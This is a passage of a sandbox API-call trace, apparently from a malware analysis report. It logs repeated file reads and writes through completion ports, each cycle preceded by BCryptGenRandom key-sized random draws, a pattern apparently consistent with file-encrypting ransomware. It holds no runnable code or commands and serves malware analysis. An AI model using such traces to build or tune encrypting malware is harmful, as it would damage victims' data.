lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.290] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x9e8a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0155.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.301] CloseHandle (hObject=0x308) returned 1 [0155.301] free (_Block=0x3f70048) [0155.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.307] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.352] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7aa6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.356] CloseHandle (hObject=0x3cc) returned 1 [0155.356] free (_Block=0x3d70450) [0155.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.379] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3658, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0155.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0155.398] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4b56, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0156.166] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.168] CloseHandle (hObject=0x3cc) returned 1 [0156.169] free (_Block=0x1ff1e60) [0156.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.289] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0156.289] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0156.290] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.291] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.291] free (_Block=0x3e305b8) [0156.291] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.291] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.291] free (_Block=0x1fa91d0) [0156.291] free (_Block=0x1fa2ed8) [0156.292] free (_Block=0x1fa90b8) [0156.292] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.377] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x37e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.378] CloseHandle (hObject=0x308) returned 1 [0156.378] free (_Block=0x3df0008) [0156.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0156.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0156.695] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.695] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.695] free (_Block=0x3e305b8) [0156.696] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.696] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.707] free (_Block=0x1fa91d0) [0156.828] free (_Block=0x1fa2ed8) [0156.908] free (_Block=0x1fa90b8) [0156.908] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.910] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.910] CloseHandle (hObject=0x308) returned 1 [0156.911] free (_Block=0x3df0008) [0156.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0156.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0156.921] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.921] free (_Block=0x3e305b8) [0156.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.921] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.921] free (_Block=0x1fa91d0) [0156.921] free (_Block=0x1fa2ed8) [0156.921] free (_Block=0x1fa90b8) [0156.921] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.923] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x21c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.932] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe42c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.948] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1088e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.962] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x107ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.975] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x59ce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.977] CloseHandle (hObject=0x308) returned 1 [0156.977] free (_Block=0x3df0008) [0156.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0156.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0156.986] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0156.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0156.986] free (_Block=0x3e305b8) [0156.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0156.986] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0156.987] free (_Block=0x1fa91d0) [0156.987] free (_Block=0x1fa2ed8) [0156.987] free (_Block=0x1fa90b8) [0156.987] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0156.989] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0156.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.001] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4236, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.002] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.003] CloseHandle (hObject=0x308) returned 1 [0157.003] free (_Block=0x3df0008) [0157.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.013] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.013] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.013] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.013] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.014] free (_Block=0x3e305b8) [0157.014] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.014] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.014] free (_Block=0x1fa91d0) [0157.014] free (_Block=0x1fa2ed8) [0157.014] free (_Block=0x1fa90b8) [0157.014] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.016] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3ca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.230] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x493e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.234] CloseHandle (hObject=0x308) returned 1 [0157.234] free (_Block=0x3df0008) [0157.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.245] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.245] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.245] free (_Block=0x3e305b8) [0157.245] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.245] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.245] free (_Block=0x1fa91d0) [0157.245] free (_Block=0x1fa2ed8) [0157.245] free (_Block=0x1fa90b8) [0157.245] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.260] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.264] CloseHandle (hObject=0x308) returned 1 [0157.264] free (_Block=0x3df0008) [0157.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.276] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.276] free (_Block=0x3e305b8) [0157.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.276] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.276] free (_Block=0x1fa91d0) [0157.276] free (_Block=0x1fa2ed8) [0157.276] free (_Block=0x1fa90b8) [0157.276] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.278] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0157.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.291] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2b0e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.293] CloseHandle (hObject=0x308) returned 1 [0157.293] free (_Block=0x3df0008) [0157.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0157.302] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.303] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0157.303] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0157.304] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.304] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.304] free 